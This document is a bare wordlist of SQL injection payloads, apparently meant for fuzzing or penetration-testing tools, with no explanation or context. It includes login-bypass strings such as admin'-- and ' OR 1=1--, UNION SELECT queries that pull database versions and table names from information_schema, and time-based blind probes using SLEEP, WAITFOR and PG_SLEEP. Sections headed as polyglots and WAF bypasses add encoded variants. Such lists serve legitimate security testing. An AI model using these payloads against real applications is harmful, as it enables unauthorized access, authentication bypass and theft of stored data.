'
"
'--
' #
'/*
' OR '1'='1
' OR 1=1--
' OR 1=1#
" OR "1"="1
" OR 1=1--
" OR 1=1#
admin'--
admin' #
admin'/*
'
' OR '1'='1
admin' --
' OR 1=1 --
" OR "1"="1
' OR 'a'='a
admin' --
' OR '1'='1
" OR "1"="1
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)--
' AND (SELECT 1 FROM (SELECT(SLEEP(10)))a)--
' AND 1=(SELECT COUNT(*) FROM tablename)--
' OR 1=1 LIMIT 1--
' OR 1=1 LIMIT 1 OFFSET 1--
' GROUP BY 1,2,3--
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 10--
'); WAITFOR DELAY '0:0:5'--
'); SELECT PG_SLEEP(5)--
' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)='
' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)='1
1' AND 1=1
1' AND 1=2
1" AND 1=1
1" AND 1=2
' OR TRUE--
" OR TRUE--
' OR 1=1#
' OR 1=1/*
' OR 'a'='a
' OR 'a'='b
' OR 1=1 LIMIT 1
' OR 1=1--
' OR 1=1#
' OR 1=1/*
' OR 1=1;--
' OR 1=1;#
' OR 1=1;/*
') OR ('1'='1
') OR ('1'='1'--
') OR ('1'='1'#
') OR ('1'='1'/*
') OR '1'='1
') OR '1'='1'--
') OR '1'='1'#
') OR '1'='1'/*
" OR "1"="1
" OR "1"="1"--
" OR "1"="1"#
" OR "1"="1"/*
" OR 1=1
" OR 1=1--
" OR 1=1#
" OR 1=1/*
" OR 1=1;--
" OR 1=1;#
" OR 1=1;/*
") OR ("1"="1
") OR ("1"="1"--
") OR ("1"="1"#
") OR ("1"="1"/*
") OR "1"="1
") OR "1"="1"--
") OR "1"="1"#
") OR "1"="1"/*
# Polyglots
SLEEP(5) /*' or SLEEP(5) or '" or SLEEP(5) or "*/
' OR 1=1 --
" OR 1=1 --
' OR '1'='1' { % / * / }
# WAF Bypass & Encoding
%27%20OR%201%3D1--
0x61646d696e
CHAR(39,79,82,39,49,39,61,39,49)
'/**/OR/**/1=1--
'OR%091=1--
'OR%0a1=1--
'OR%0b1=1--
'OR%0c1=1--
'OR%0d1=1--
'OR%a01=1--
'#
'--
'-- -
' OR 1=1 LIMIT 1--
' OR 1=1 LIMIT 1 OFFSET 1--
' GROUP BY 1,2,3--
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 10--
' UNION SELECT 1,2,3--
' UNION SELECT @@VERSION,2,3--
' UNION SELECT version(),2,3--
' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)--
' AND (SELECT 1 FROM (SELECT(SLEEP(10)))a)--
{"id": "1' OR 1=1--"}
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
==
=
'
' --
' #
' –
'--
'/*
'#
" --
" #
"/*
' and 1='1
' and a='a
 or 1=1
 or true
' or ''='
" or ""="
1′) and '1′='1–
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
 and 1=1
 and 1=1–
' and 'one'='one
' and 'one'='one–
' group by password having 1=1--
' group by userid having 1=1--
' group by username having 1=1--
 like '%'
 or 0=0 --
 or 0=0 #
 or 0=0 –
' or         0=0 #
' or 0=0 --
' or 0=0 #
' or 0=0 –
" or 0=0 --
" or 0=0 #
" or 0=0 –
%' or '0'='0
 or 1=1
 or 1=1--
 or 1=1/*
 or 1=1#
 or 1=1–
' or 1=1--
' or '1'='1
' or '1'='1'--
' or '1'='1'/*
' or '1'='1'#
' or '1′='1
' or 1=1
' or 1=1 --
' or 1=1 –
' or 1=1--
' or 1=1;#
' or 1=1/*
' or 1=1#
' or 1=1–
') or '1'='1
') or '1'='1--
') or '1'='1'--
') or '1'='1'/*
') or '1'='1'#
') or ('1'='1
') or ('1'='1--
') or ('1'='1'--
') or ('1'='1'/*
') or ('1'='1'#
'or'1=1
'or'1=1′
" or "1"="1
" or "1"="1"--
" or "1"="1"/*
" or "1"="1"#
" or 1=1
" or 1=1 --
" or 1=1 –
" or 1=1--
" or 1=1/*
" or 1=1#
" or 1=1–
") or "1"="1
") or "1"="1"--
") or "1"="1"/*
") or "1"="1"#
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"/*
") or ("1"="1"#
) or '1′='1–
) or ('1′='1–
' or 1=1 LIMIT 1;#
'or 1=1 or ''='
"or 1=1 or ""="
' or 'a'='a
' or a=a--
' or a=a–
') or ('a'='a
" or "a"="a
") or ("a"="a
') or ('a'='a and hi") or ("a"="a
' or 'one'='one
' or 'one'='one–
' or uid like '%
' or uname like '%
' or userid like '%
' or user like '%
' or username like '%
' or 'x'='x
') or ('x'='x
" or "x"="x
' OR 'x'='x'#;
'=' 'or' and '=' 'or'
' UNION ALL SELECT 1, @@version;#
' UNION ALL SELECT system_user(),user();#
' UNION select table_schema,table_name FROM information_Schema.tables;#
admin' and substring(password/text(),1,1)='7
' and substring(password/text(),1,1)='7
' or 1=1 limit 1 -- -+
'="or'
